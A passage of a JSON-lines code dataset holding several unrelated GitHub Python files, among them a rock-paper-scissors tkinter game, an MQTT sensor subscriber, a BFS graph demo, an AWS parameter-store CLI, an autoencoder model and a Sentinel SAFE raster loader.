Systems\")\r\nelif mathsScore==\"E\":\r\n computerSales.append(fullName)\r\n print(welcomeMessage,\" Computer Sales at IT Systems\")\r\nelse:\r\n print(\"Unfortunately\",fullName,\" your application wasn't successfully better luck next time\")\r\n","repo_name":"ezzycodes/college_enrollment","sub_path":"enroll.py","file_name":"enroll.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"358202042","text":"from Viewer.viewer import SimpleViewer\nfrom Dataset.SOT.Storage.MemoryMapped.dataset import SingleObjectTrackingDatasetSequence_MemoryMapped\nfrom evaluation.SOT.util.simple_sequence_prefetcher import get_simple_sequence_data_prefetcher\nfrom tqdm import tqdm\nfrom data.operator.bbox.spatial.xyxy2xywh import bbox_xyxy2xywh\n\n\nclass SequenceRunner:\n def __init__(self, tracker, sequence: SingleObjectTrackingDatasetSequence_MemoryMapped):\n self.tracker = tracker\n self.sequence = sequence\n assert len(sequence) > 1\n\n def __iter__(self):\n self.index = 0\n self.sequence_data_iter = iter(get_simple_sequence_data_prefetcher(self.sequence))\n return self\n\n def __next__(self):\n image, groundtruth_bounding_box = next(self.sequence_data_iter)\n if self.index == 0:\n self.tracker.initialize(image, groundtruth_bounding_box)\n predicted_bounding_box = groundtruth_bounding_box.tolist()\n else:\n predicted_bounding_box, _ = self.tracker.track(image)\n self.index += 1\n return (image.permute(1, 2, 0), bbox_xyxy2xywh(groundtruth_bounding_box.tolist()), bbox_xyxy2xywh(predicted_bounding_box))\n\n\nclass VisibleTrackerRunner:\n def __init__(self, tracker):\n self.tracker = tracker\n self.viewer = SimpleViewer()\n # self.viewer.switch_backend()\n\n def run(self, sequence: SingleObjectTrackingDatasetSequence_MemoryMapped):\n assert isinstance(sequence, SingleObjectTrackingDatasetSequence_MemoryMapped)\n\n with tqdm(total=len(sequence)) as process_bar:\n process_bar.set_description_str(sequence.get_name())\n runner = SequenceRunner(self.tracker, sequence)\n\n for index_of_frame, (image, groundtruth_bounding_box, predicted_bounding_box) in enumerate(runner):\n self.viewer.clear()\n self.viewer.drawImage(image)\n self.viewer.drawBoundingBox(groundtruth_bounding_box)\n if index_of_frame != 0:\n self.viewer.drawBoundingBox(predicted_bounding_box, (0, 1, 0))\n self.viewer.update()\n # self.viewer.waitKey()\n self.viewer.pause(0.0001)\n process_bar.update()\n\n self.viewer.waitKey()\n\n\ndef visualize_tracking_procedure_on_datasets(tracker, datasets):\n visualizer = VisibleTrackerRunner(tracker)\n for dataset in datasets:\n for sequence in dataset:\n visualizer.run(sequence)\n\n\ndef visualize_tracking_procedure_on_standard_datasets(tracker):\n from evaluation.SOT.runner import get_standard_evaluation_datasets\n visualize_tracking_procedure_on_datasets(tracker, get_standard_evaluation_datasets())\n","repo_name":"LitingLin/ubiquitous-happiness","sub_path":"evaluation/SOT/visualization/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"320560957","text":"import logging\nimport asyncio\nfrom hbmqtt.client import MQTTClient, ClientException\nfrom hbmqtt.mqtt.constants import QOS_0\n\nfrom time import gmtime, strftime\nfrom datetime import datetime\n\nimport re,json\n\nimport water_log_store as store\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n#topics will contain the sensor id for now something like version/deviceid123/dataLabel -- less verbose is more managable\n#so for instance alpha/alpha_deviceid123/temp\n\nTOPIC = 'ALPHA/+/TEMP'\nBROKER = 'mqtt://192.168.0.100'\nMQTT_PORT = '4444'\n\n@asyncio.coroutine\ndef subscriber_coro():\n C = MQTTClient()\n\n #mqtt[s]://[username][:password]@host.domain[:port]\n\n yield from C.connect(BROKER+':'+MQTT_PORT)\n yield from C.subscribe([(TOPIC,QOS_0)])\n\n print(C.client_id)\n while True:\n try:\n message = yield from C.deliver_message()\n\n logger.debug(message.__dict__)\n\n packet = message.publish_packet\n\n sensor_id = re.split('_|/',packet.variable_header.topic_name)[-2]\n ts = message.publish_packet.protocol_ts\n data = str(packet.payload.data,\"utf-8\")\n\n logger.debug(\"%s => %s => %s\" % (packet.variable_header.topic_name, str(packet.payload.data,\"utf-8\"), strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())))\n\n message_data = dict([(\"sensor_id\",sensor_id),(\"temperature\",data),(\"time_stamp\",ts.isoformat())])\n data_json = json.dumps(message_data)\n # print(data_json)\n store.handle_microgreens_data(data_json)\n\n except Error as ce:\n logger.error(\"trigger disconnet: \", ce)\n break\n\n yield from C.unsubscribe([(TOPIC,QOS_0)])\n logger.info(\"UnSubscribed\")\n yield from C.disconnect()\n\nif __name__ == '__main__':\n formatter = \"[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s\"\n logging.basicConfig(level=logging.INFO, format=formatter)\n asyncio.get_event_loop().run_until_complete(subscriber_coro())\n","repo_name":"withattribution/waterlog","sub_path":"water_subscriber.py","file_name":"water_subscriber.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34599109909","text":"from somajo import SoMaJo\nimport os\nimport re\n\nINPUT_FILE = \"/home/phmay/data/ml-data/gtt/german-dbmdz-corpus-unsplitted-parts/opensubtitles.txt\"\nOUTPUT_FILE = \"opensub_clean.txt\"\n\nprefix_patten = re.compile('^- ')\npostfix_pattern = re.compile('--$')\n\nif __name__ == '__main__':\n new_line = re.sub(postfix_pattern, '', '- test prefix.--')\n with open(INPUT_FILE, \"r\") as input_file, \\\n open(OUTPUT_FILE, \"w\") as output_file:\n for line in input_file:\n if line.startswith('[') or line.startswith('('):\n continue\n line = line.strip()\n line = re.sub(prefix_patten, '', line)\n line = re.sub(postfix_pattern, '', line)\n if len(line) > 15:\n output_file.write(line + '\\n')\n","repo_name":"German-NLP-Group/german-transformer-training","sub_path":"src/process_opensubtitles_files.py","file_name":"process_opensubtitles_files.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"63"} +{"seq_id":"30982988552","text":"import regex\nimport os\nimport unittest\nimport glob\nfrom time import perf_counter as clock\nfrom mlmorph import Analyser, tokenize\n\n\nCURR_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))\nMIN_COVERAGE = 57.10\n\n\ndef is_valid_malayalam_word(word):\n word = word.strip()\n if (len(word) <= 1):\n return False\n # Ignore all non-Malayalam words\n if regex.search(r\"[\\u0D00-\\u0D7F\\u200C-\\u200D]+\", word) is None:\n return False\n return True\n\n\nclass CoverageTests(unittest.TestCase):\n analyser = Analyser()\n\n def test_total_coverage(self):\n total_tokens_count = 0\n total_analysed_tokens_count = 0\n start = clock()\n print(\"%40s\\t%8s\\t%8s\\t%s\" %\n ('File name', 'Words', 'Analysed', 'Percentage'))\n for filename in glob.glob(os.path.join(CURR_DIR, \"coverage\", \"*.txt\")):\n with open(filename, 'r') as file:\n tokens_count = 0\n analysed_tokens_count = 0\n for line in file:\n for word in tokenize(line):\n if not is_valid_malayalam_word(word):\n continue\n tokens_count += 1\n analysis = self.analyser.analyse(word, False)\n if len(analysis) > 0:\n analysed_tokens_count += 1\n percentage = (analysed_tokens_count/tokens_count)*100\n total_tokens_count += tokens_count\n total_analysed_tokens_count += analysed_tokens_count\n print(\"%40s\\t%8d\\t%8d\\t%3.2f%%\" % (os.path.basename(\n filename), tokens_count, analysed_tokens_count, percentage))\n file.close()\n percentage = (total_analysed_tokens_count/total_tokens_count)*100\n time_taken = clock() - start\n print('%40s\\t%8d\\t%8d\\t%3.2f%%' %\n ('Total', total_tokens_count, total_analysed_tokens_count, percentage))\n print('Time taken: %5.3f seconds' % (time_taken))\n self.assertTrue(percentage >= MIN_COVERAGE,\n 'Coverage decreased from %3.2f to %3.2f' % (MIN_COVERAGE, percentage))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smc/mlmorph","sub_path":"tests/coverage-test.py","file_name":"coverage-test.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"63"} +{"seq_id":"32852646155","text":"from MongoConnect import ConnectModule\nmy_con = ConnectModule.connect()\ncollection = my_con.db[\"Address\"]\n\n\nclass UpdateAddress:\n def __init__(self, up_register_id, up_house_num, up_street, up_city, up_district, up_state, up_pincode):\n self.up_register_id = up_register_id\n self.up_house_num = up_house_num\n self.up_street = up_street\n self.up_city = up_city\n self.up_district = up_district\n self.up_state = up_state\n self.up_pincode = up_pincode\n\n def update_add(self):\n newdata = {\"$set\": {\n \"House number \": self.up_house_num,\n \"Street \": self.up_street,\n \"City \": self.up_city,\n \"District\": self.up_district,\n \"State\": self.up_state,\n \"Pin Code\": self.up_pincode\n }\n }\n return collection.update({\"Registration Id\": self.up_register_id}, newdata)\n","repo_name":"hcmuleva/personal-profile","sub_path":"lms_aaditya/Address/AddressModules/update_address.py","file_name":"update_address.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40090701708","text":"#! /usr/bin/env python\n# 3.7\n\nfrom collections import deque\n\nclass BFSResult:\n\tdef __init__(self):\n\t\tself.level = {}\n\t\tself.parent = {}\n\t\n\tdef __repr__(self):\n\t\tnode_str = f'{self.__class__.__name__} levels - node in level\\n'\n\t\tfor n in self.level.keys():\n\t\t\tnode_str += f\"{n.name} \".rjust(22)\n\t\t\ttry:\n\t\t\t\tnode_str += f\"{str(self.level[n])} - {self.parent[n]}\"\n\t\t\texcept:\n\t\t\t\tnode_str += f\"{str(self.level[n])} - None\"\t\t\t\n\t\t\tnode_str += \"\\n\"\n\t\treturn node_str\t\t\t\n\nclass Graph:\n\tdef __init__(self):\n\t\tself.adj = {}\n\n\tdef add_edge(self, u, v):\n\t\t#if self.adj[u] is None:\n\t\tif u not in self.adj:\n\t\t\tself.adj[u] = []\n\t\t\t\n\t\tif v not in self.adj[u]:\n\t\t\tself.adj[u].append(v)\n\t\n\tdef __repr__(self):\n\t\tnode_str = f'{self.__class__.__name__} nodes - adjacency lists\\n'\n\t\tfor n in self.adj.keys():\n\t\t\tnode_str += f\"{n} \".rjust(22)\n\t\t\tnode_str += ','.join([item.name for item in self.adj[n]])\n\t\t\tnode_str += \"\\n\"\n\t\treturn node_str\n\n# Matrix representation\n# A B C D E\n# A 1 1 \n# B\n# C\n# D\n# E\n\n\nclass Node:\n\tdef __init__(self, name):\n\t\tself.name = name\n\tdef __repr__(self):\t\t\t\t\t# so networkx displays meaningful name on the node!\n\t\treturn self.name\n\ndef bfs(g, s):\n\t'''\n\tQueue-based implementation of BFS.\t\t\n\tArgs:\n\tg: a graph with adjacency list adj such that g.adj[u] is a list of u's\n\tneighbors.\n\ts: source.\n\t'''\n\tr = BFSResult()\n\tr.parent = {s: None}\n\tr.level = {s: 0}\n\ts.level = 0\n\t\n\tqueue = deque()\n\tqueue.append(s)\n\n\twhile queue:\n\t\tu = queue.popleft()\n\t\tfor n in g.adj[u]:\n\t\t\tif n not in r.level:\n\t\t\t\tr.parent[n] = u\n\t\t\t\tn.parent = u \t\t\t\t\t# maze\n\t\t\t\tr.level[n] = r.level[u] + 1\n\t\t\t\tn.level = r.level[n] \t\t\t# maze\n\t\t\t\tqueue.append(n)\n\n\treturn r\n\n\n\nif __name__ == '__main__':\n\tfrom pathlib import Path\n\tfrom pprint import pprint\n\timport re\n\timport random\n\tDATAFILE = Path('./scratch/food.txt')\n\t# to draw graph\n\timport networkx as nx\n\t# https://github.com/networkx/networkx\n\t# https://networkx.org/documentation/stable/tutorial.html\n\t# https://networkx.org/documentation/stable/reference/drawing.html#drawing\n\timport matplotlib.pyplot as plt\n\t\n\t# TODO try\n\t# https://graph-tool.skewed.de/\n\t# https://graph-tool.skewed.de/static/doc/quickstart.html\n\n\tG = nx.Graph()\n\t\n\t# # create list random names\n\t# with open(DATAFILE,'r') as f:\n\t# \ttext = f.read()\n\t# \n\t# names = []\n\t# count = 0\n\t# for match in re.findall(r'information (.*?) \\(', text, flags = re.MULTILINE | re.DOTALL):\n\t# \tr = random.randint(0,9)\n\t# \tcount += 1\n\t# \tif r % 5 == 0:\n\t# \t\tprint(f\"{r}- {match}\")\n\t# \t\tnames.append(match)\n\t# \tif len(names) >30:\n\t# \t\tbreak\n\t# \t\t\n\t# print(count)\n\t# pprint(names)\n\t\n\t# create graph\t\n\tnode_names = ['semolina','hazelnut choc','picos blue',\n\t\t\t\t 'kaffir lime leaves','focaccia','tagliatelle','worcester sauce','maris piper potatoes',\n\t\t\t\t 'capers','roast lamb leg','salmon','salmon skirt','black fungus','sbs olive spread','scampi',\n\t\t\t\t 'soho tiger prawns','trout','haricot beans','oregano','xantham gum','octopus','rhubarb',\n\t\t\t\t 'green tabasco','white twix','cashew nuts','bran flakes','basa','porcinini mushrooms',\n\t\t\t\t 'haggis','halloumi']\n\t\n\tnodes = []\n\tfor i in node_names:\n\t\tnode_to_add = Node(i) \n\t\tnodes.append(node_to_add)\t\t\n\t\tG.add_node(node_to_add)\t\t\t\t\t\t\t\t# graphics representation\n\t\n\tC_LOW = 1\t# 5\n\tC_HIGH = 3\t# 15\n\t\n\tg = Graph()\n\tfor i in nodes:\n\t\t# connect each node to at least 5 other nodes\n\t\tconnections = random.randint(C_LOW,C_HIGH)\n\t\tfor c in range(connections):\n\t\t\trand_edge = random.randint(0,len(node_names)-1)\n\t\t\tg.add_edge(i,nodes[rand_edge])\n\t\t\tG.add_edge(i,nodes[rand_edge])\t\t\t\t\t# graphics representation\n\t\t\n\tpprint(g)\n\t\n\tsource_node = nodes[random.randint(0,len(node_names)-1)] \n\tbfs_result = bfs(g, source_node)\n\t\n\tpprint(bfs_result)\n\t\n\tprint(f\"Start node: {source_node.name}\")\n\n\tnx.draw(G, with_labels=True) # , font_weight='bold')\n\tplt.show()\n\t","repo_name":"UnacceptableBehaviour/algorithms","sub_path":"algos/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"72498877319","text":"# -*- coding: utf-8 -*-\n\n# The maximum length for the fully qualified parameter name is 1011 characters.\n# A hierarchy can have a maximum of 15 levels.\n# The maximum length for the string value is 4096.\n\nfrom aws_stash import __project_name__, __version__\n\nimport sys\n\nfrom aws_stash.ParamStore import ParamStore\nfrom aws_stash.Output import Output\n\n\ndef main():\n def valid_path(value):\n if value is None:\n return value\n import re\n pattern = '^/(([A-Za-z0-9-_.]+)/?)*$'\n if not re.match(pattern, value):\n raise argparse.ArgumentTypeError(\n \"{0} is an invalid path, must match pattern '{1}'' \".format(value, pattern))\n return value\n\n import argparse\n import itertools\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--version', action='version',\n version='%(prog)s {}'.format(__version__), help='Show version')\n parser.add_argument('path', type=valid_path,\n help='Path to the parameter key or folder containing parameter keys')\n parser.add_argument('-p', '--params', nargs='+',\n action='append', default=[], help='Parameter keys')\n parser.add_argument('-w', '--write', nargs='?', const='',\n help='Write parameter value, leave it empty to input it from STDIN')\n parser.add_argument('-m', '--multi-line', action='store_true',\n help='Accept multi-line value from STDIN, end input with CTRL+D')\n parser.add_argument('-f', '--force', action='store_true',\n help='Force overwrite existing value')\n parser.add_argument('-d', '--description', default=None,\n help='Add a description to the parameter')\n parser.add_argument('-k', '--kms', default='aws/ssm',\n help='KMS key alias to encrypt the value')\n parser.add_argument('-c', '--copy', action='store_true',\n help='Copy value to the clipboard instead of showing it')\n parser.add_argument('-o', '--output', choices=['text', 'json', 'export'],\n default='text', help='Output format')\n parser.add_argument('-l', '--list', action='store_true',\n help='List all paramaters under same level path')\n parser.add_argument('-r', '--recursive', action='store_true',\n help='Process all paramaters recursively starting from path')\n parser.add_argument('--delete', action='store_true',\n help='Delete a single parameter or all parameters recursively starting from path if using --recursive')\n parser.add_argument('-q', '--quiet', action='store_true',\n help='Output only the values of the parameters')\n parser.add_argument('--full', action='store_true',\n help='Output fully qualified parameter path')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Output parameters details')\n parser.add_argument('--find-in-parents', action='store_true',\n help='Find a key in parent folders')\n\n args = parser.parse_args()\n\n args.params = list(set(itertools.chain.from_iterable(args.params)))\n\n param_store = ParamStore()\n output = Output()\n\n if args.write is not None:\n version = param_store.write_parameter(\n path=args.path,\n value=args.write,\n description=args.description,\n force=args.force,\n multi_line=args.multi_line,\n kms=args.kms\n )\n if version is None:\n sys.exit(1)\n if not args.quiet:\n print('Version: {}'.format(version))\n\n elif args.delete:\n version = param_store.delete_parameters(\n path=args.path,\n recursive=args.recursive\n )\n\n else:\n if args.list:\n parameters = param_store.list_parameters(\n path=args.path,\n recursive=args.recursive,\n params=args.params,\n verbose=args.verbose\n )\n else:\n parameters = param_store.get_parameters(\n path=args.path,\n params=args.params,\n find_in_parents=args.find_in_parents,\n verbose=args.verbose\n )\n\n if len(parameters):\n output.output(args, parameters)\n if not len(parameters) or (\n args.params and len(parameters) != len(args.params)):\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"askainet/aws-stash","sub_path":"aws_stash/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"35262458444","text":"\"\"\"Expected Improvement calculation for one or more objectives.\"\"\" \n\nimport logging\ntry:\n from numpy import exp, abs, pi\nexcept ImportError as err:\n logging.warn(\"In %s: %r\" % (__file__, err))\n_check = ['numpy']\ntry:\n from math import erf # py27 and later has erf in the math module\nexcept ImportError as err:\n logging.warn(\"In %s: %r\" % (__file__, err))\n try:\n from scipy.special import erf\n except ImportError as err:\n logging.warn(\"In %s: %r\" % (__file__, err))\n _check.append('scipy')\n\nfrom openmdao.main.datatypes.api import Slot, Str, Float\nfrom openmdao.lib.casehandlers.api import CaseSet\n\nfrom openmdao.main.api import Component\nfrom openmdao.util.decorators import stub_if_missing_deps\n\nfrom openmdao.main.uncertain_distributions import NormalDistribution\n\n@stub_if_missing_deps(*_check)\nclass ExpectedImprovement(Component):\n best_case = Slot(CaseSet, iotype=\"in\",\n desc=\"CaseSet which contains a single case \"\n \"representing the criteria value.\", required=True)\n \n criteria = Str(iotype=\"in\",\n desc=\"Name of the variable to maximize the expected \"\n \"improvement around. Must be a NormalDistrubtion type.\")\n \n predicted_value = Slot(NormalDistribution,iotype=\"in\",\n desc=\"The Normal Distribution of the predicted value \"\n \"for some function at some point where you wish to\"\n \" calculate the EI.\")\n \n EI = Float(0.0, iotype=\"out\", \n desc=\"The expected improvement of the predicted_value.\")\n \n PI = Float(0.0, iotype=\"out\", \n desc=\"The probability of improvement of the predicted_value.\")\n \n def execute(self): \n \"\"\" Calculates the expected improvement of the model at a given point.\n \"\"\"\n \n mu = self.predicted_value.mu\n sigma = self.predicted_value.sigma\n best_case = self.best_case[0]\n try: \n target = best_case[self.criteria]\n except KeyError: \n self.raise_exception(\"best_case did not have an output which \"\n \"matched the criteria, '%s'\"%self.criteria,\n ValueError) \n try:\n \n self.PI = 0.5+0.5*erf((1/2**.5)*(target-mu/sigma))\n \n T1 = (target-mu)*.5*(1.+erf((target-mu)/(sigma*2.**.5)))\n T2 = sigma*((1./((2.*pi)**.05))*exp(-0.5*((target-mu)/sigma)**2.))\n self.EI = abs(T1+T2)\n\n except (ValueError,ZeroDivisionError): \n self.EI = 0\n self.PI = 0 \n \n \n \n","repo_name":"RubenvdBerg/SatToolAG","sub_path":"OldOpenMDAO/OpenMDAO-Framework-0.2.7/openmdao.lib/src/openmdao/lib/components/expected_improvement.py","file_name":"expected_improvement.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12249605213","text":"from tkinter import *\nfrom PIL import Image, ImageTk\nimport random\n\nroot = Tk()\n\nroot.iconbitmap(r'C:\\Users\\Hakan\\Desktop\\Hakan\\image\\icon.ico')\nroot.title('ROCK SCISSORS PAPER')\n\nroot.resizable(width = False, height = False)\n\nRockPhoto = ImageTk.PhotoImage(Image.open(\"ROCK.png\"))\nPaperPhoto = ImageTk.PhotoImage(Image.open(\"PAPER.png\"))\nScissorsPhoto = ImageTk.PhotoImage(Image.open(\"SCISSORS.png\"))\n\nimage_list = [RockPhoto, PaperPhoto, ScissorsPhoto]\n\nuser = \"\"\ncomputer = \"\"\nuser_score = 0\ncomputer_score = 0\n\nmylabel = Label(root, text = \"\")\ncomputer_label = Label(root, text = \"\")\nlabel = Label(root, text = \"\")\nuser_score_label = Label(root, text = \"\")\ncomputer_score_label = Label(root, text = \"\")\n\ndef select_rock():\n global mylabel\n global user\n\n mylabel.grid_forget()\n mylabel.destroy()\n\n mylabel = Label(root, image = image_list[0])\n mylabel.grid(row = 2, column = 0)\n\n user = image_list[0]\n\n Computer_pick()\n\n if_else(user, computer)\n\n mylabel2 = Label(root, text = \"PLAYER\", fg = \"White\", bg = \"Blue\") \n mylabel2.grid(row = 7, column = 0)\n\ndef select_paper():\n global mylabel\n global user\n \n mylabel.grid_forget()\n\n mylabel = Label(root, image = image_list[1])\n mylabel.grid(row = 2, column = 0)\n\n user = image_list[1]\n\n Computer_pick()\n\n if_else(user, computer)\n\n mylabel2 = Label(root, text = \"PLAYER\", fg = \"White\", bg = \"Blue\")\n mylabel2.grid(row = 7, column = 0) \n\ndef select_scissors():\n global mylabel\n global user\n\n mylabel.grid_forget()\n \n mylabel = Label(root, image = image_list[2])\n mylabel.grid(row = 2, column = 0)\n\n user = image_list[2]\n\n Computer_pick()\n\n if_else(user, computer)\n\n mylabel2 = Label(root, text = \"PLAYER\", fg = \"White\", bg = \"Blue\")\n mylabel2.grid(row = 7, column = 0)\n\ndef Computer_pick():\n global computer_label\n global computer\n\n computer_label.grid_forget()\n \n computer = random.choice(image_list)\n\n computer_label = Label(root, image = computer)\n computer_label.grid(row = 2, column = 2) \n\n mylabel3 = Label(root, text = \"COMPUTER\", fg = \"White\", bg = \"Blue\")\n mylabel3.grid(row = 7, column = 2)\n \n\ndef if_else(user, computer):\n global label\n global user_score_label\n global user_score\n global computer_score_label\n global computer_score\n\n if user == image_list[0] and computer == image_list[1]:\n label.grid_forget()\n label = Label(root, text = \"Computer Won\")\n label.grid(row = 8, column = 2)\n computer_score += 1\n elif user == image_list[0] and computer == image_list[2]:\n label.grid_forget()\n label = Label(root, text = \"User Won\")\n label.grid(row = 8, column = 0)\n user_score += 1\n elif user == image_list[1] and computer == image_list[2]:\n label.grid_forget()\n label = Label(root, text = \"Computer Won\")\n label.grid(row = 8, column = 2)\n computer_score += 1\n elif user == image_list[1] and computer == image_list[0]:\n label.grid_forget()\n label = Label(root, text = \"User Won\")\n label.grid(row = 8, column = 0)\n user_score += 1\n elif user == image_list[2] and computer == image_list[0]:\n label.grid_forget()\n label = Label(root, text = \"Computer Won\")\n label.grid(row = 8, column = 2)\n computer_score += 1\n elif user == image_list[2] and computer == image_list[1]:\n label.grid_forget()\n label = Label(root, text = \"User Won\")\n label.grid(row = 8, column = 0)\n user_score += 1\n elif user == image_list[0] and computer == image_list[0]:\n label.grid_forget()\n label = Label(root, text = \"Draw\")\n label.grid(row = 8, column = 1)\n elif user == image_list[1] and computer == image_list[1]:\n label.grid_forget()\n label = Label(root, text = \"Draw\")\n label.grid(row = 8, column = 1)\n elif user == image_list[2] and computer == image_list[2]:\n label.grid_forget()\n label = Label(root, text = \"Draw\")\n label.grid(row = 8, column = 1)\n\n clear_button = Button(root, text = \"Clear score\", command = clear)\n clear_button.grid(row = 10, column = 1)\n\n exit_button = Button(root, text = \"Exit!\", command = root.quit, bg = \"Black\", fg = \"White\")\n exit_button.grid(row = 13, column = 1)\n exit_button.place(x = 250, y = 600)\n\n user_score_label = Label(root, text = user_score)\n user_score_label.grid(row = 9, column = 0)\n computer_score_label = Label(root, text = computer_score)\n computer_score_label.grid(row = 9, column = 2)\n\ndef clear():\n global user_score\n global computer_score\n\n user_score = 0\n computer_score = 0\n\n label.grid_forget()\n\n user_score_label = Label(root, text = user_score)\n user_score_label.grid(row = 9, column = 0)\n computer_score_label = Label(root, text = computer_score)\n computer_score_label.grid(row = 9, column = 2)\n\ndef play():\n root.geometry(\"600x700\")\n\n play_button.destroy()\n\n my_label = Label(root, text = \"Select\", bg = \"Green\", fg = \"White\")\n my_label.grid(row = 0, column = 4)\n\n Rock_Button = Button(root, text = \"Rock\", command = select_rock)\n Rock_Button.grid(row = 0, column = 0)\n\n Paper_Button = Button(root, text = \"Paper\", command = select_paper)\n Paper_Button.grid(row = 0, column = 1)\n\n Scissors_Button = Button(root, text = \"Scissors\", command = select_scissors)\n Scissors_Button.grid(row = 0, column = 2)\n\nroot.geometry(\"30x30\")\nplay_button = Button(root, text = \"Play\", command = play)\nplay_button.grid(row = 0, column = 0, padx = 100)\nplay_button.place(x = 40, y = 0)\n\n\n\nroot.mainloop()","repo_name":"MesutHakanTaskiner/Rock-Scissors-Paper","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37931731999","text":"'''\n A simple autoencoder model that repeats previous works\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\nfrom src.models.common_blocks import ConvBlock, ConvTransposeBlock\nactivations = {\n 'relu': F.relu,\n 'sigmoid': F.sigmoid,\n 'softmax': F.softmax\n}\n\n\nclass EncoderBlock(nn.Sequential):\n \n def __init__(self, in_channels, features_num, expand_rate, kernel_sizes=[5,2,5,2,5], \n strides = [1,2,1,2,1], paddings = [2,0,2,0,2], bias = True):\n super(EncoderBlock, self).__init__()\n for i in range(len(kernel_sizes)):\n alias = \"_\".join([\"Conv2d\", str(kernel_sizes[i]), str(features_num)])\n self.add_module(alias, ConvBlock(in_channels, features_num, kernel_sizes[i], strides[i], \n paddings[i], bias))\n in_channels = features_num\n if strides[i] == 1:\n features_num *= expand_rate \n\n \nclass MyAutoencoderTied(nn.Module):\n def __init__(self, in_channels=1, start_features_num=16, expand_rate=2, kernel_sizes=[5,2,5,2,5], \n strides = [1,2,1,2,1], paddings = [2,0,2,0,2], bias = False, final_activation='relu'):\n super(MyAutoencoderTied, self).__init__()\n self.final_activation = final_activation\n self.encoder = EncoderBlock(in_channels, start_features_num, expand_rate, kernel_sizes, strides,\n paddings, bias)\n \n max_features = start_features_num * expand_rate*len([stride for stride in strides if stride!=1])\n \n \n def forward(self, x):\n\n x = self.encoder(x)\n for i in range(len(self.encoder)-1,-1,-1):\n conv_layer = self.encoder[i].conv\n x = F.conv_transpose2d(input=x, weight=conv_layer.weight, padding=conv_layer.padding, stride=conv_layer.stride,bias=conv_layer.bias)\n if i==0 and self.final_activation=='linear':\n continue\n else:\n x = activations['relu'](x)\n return x\n\n\ndef myAutoencoderTied(in_channels, out_channels, final_activation):\n return MyAutoencoderTied(in_channels, 16, 2, kernel_sizes=[5,2,5,2,5], \n strides = [1,2,1,2,1], paddings = [2,0,2,0,2], final_activation=final_activation)\n","repo_name":"kubrak94/training_pipeline","sub_path":"src/models/autoencoder_tied.py","file_name":"autoencoder_tied.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16092676399","text":"# External Imports\nimport logging\nimport re\n\nimport numpy as np\nimport rasterio as rio\nfrom typing import Optional, List\nfrom copy import deepcopy\nfrom datetime import datetime\n\n# Internal Imports\nfrom raster_pack.exceptions import GeospatialDataException\nfrom raster_pack.dataset.dataset import Dataset\n\n# Setup Logger\nlogger = logging.getLogger(\"raster_pack.io.safe\")\n\n\ndef get_datasets(path: str, flat: Optional[bool] = False) -> List[Dataset]:\n \"\"\"Create a list of datasets from a given SAFE file\n\n :param path: The path the SAFE file is located at\n :param flat: Whether or not the output list should be flat or nested\n :return: A list of Dataset objects containing the data from the SAFE file\n \"\"\"\n\n # Get Subdatasets as properly formatted path strings\n subdataset_paths = []\n parent_dataset_path = None\n with rio.open(path) as dataset:\n # Get the path for the parent dataset\n parent_dataset_path = dataset.name\n\n # Get the GDAL-formatted paths for all the subdatasets\n if dataset.subdatasets is not None and len(dataset.subdatasets) > 0:\n subdataset_paths = dataset.subdatasets\n else:\n raise RuntimeError(\"No subdatasets found in the given SAFE file!\")\n\n # Create Dataset object of the parent dataset\n # Note: We ignore missing CRS, etc. data for parent datasets. This is common with SAFE files\n parent_dataset = create_dataset(path=parent_dataset_path)\n\n # Create Dataset objects from subdatasets\n datasets = []\n for subdataset_path in subdataset_paths:\n new_dataset = create_dataset(subdataset_path)\n datasets.append(new_dataset)\n\n if flat:\n # Note: Not a good idea to include the \"empty\" parent dataset\n # datasets.append(parent_dataset)\n\n # Return loaded datasets\n return datasets\n else:\n # Return parent dataset with nested subdatasets\n assert parent_dataset is not None\n parent_dataset.subdatasets = datasets\n return [parent_dataset]\n\n\ndef create_dataset(path: str, datatype: Optional[object] = None) -> Dataset:\n \"\"\"Create a dataset from a given GDAL-formatted SAFE subdataset path string\n\n :param path: GDAL-formatted subdataset path\n :param datatype: Rasterio datatype to use\n :return: Dataset created from the GDAL-compatible dataset at the specified path\n \"\"\"\n\n # --[ Open Raster for Processing, Get Important Values ]--\n with rio.open(path) as dataset:\n\n # Display warning for user if a CRS is not detected in the source raster\n if dataset.crs is None:\n logger.warning(\"No CRS detected for input raster file! This may be an issue with the file or 